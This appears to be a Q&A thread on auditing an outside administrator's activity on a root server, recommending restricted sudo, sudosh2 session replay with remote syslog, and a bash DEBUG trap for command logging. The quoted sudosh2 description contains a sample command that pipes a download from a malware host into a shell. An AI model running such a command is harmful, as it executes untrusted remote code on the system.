I want to give access to my root server to an external system administrator, but i want to be sure to double check what he is doing to my server, e.g. copying data i don't want them to do and so on. I would also like to take a track of whatever file is accessed, even in read only and not edited.
How can i do that?
Don't give him root access. Instead, give him an un-privileged user account and request that he do all of his work through
sudo
, which will log all of his commands.Keep in mind that if this person has ill intentions and you give him full sudo privileges, he will find a way to carry out those ill intentions without those commands being logged. In this case, only grant him access to the specific commands he needs to do his job.
Trust, but verify!
Check out sudosh2. sudosh2 is provided by FreeBSD ports. Packages are available for RedHat and Ubuntu. Here is the description from their website:
Sudosh will allow you to replay the user's session, which will allow you to see all input and output as the user saw it. You see everything, keystrokes, typos, backspaces, what did they edit in
vi
, the output ofwget -O- http://zyxzyxzyxzyx.ru/haxor/malware | /bin/sh
, etc.It's possible to send sudosh logs to syslog, so that they can be stored on a central syslog server away from the system.
Note that sudosh2 is a replacement for sudosh, which was abandoned by it's author
Do you work at an academic institution where users insist on having superuser privledges? Or do you work at a corporation and want to allow users to have superuser privileges on their own VMs? This might be the solution for you.
I'm not familiar with sudosh2, but I put the following in my
.bashrc
to log all the commands I type in abash
shell to the file~/.command_log
:The above sets a trap on
DEBUG
, which is executed just before an ordinary command is executed. Thecaller
built-in is used to test whether the command is being typed at an interactive shell or run via something like.bashrc
. The value${BASH_COMMAND}
contains the command currently being executed.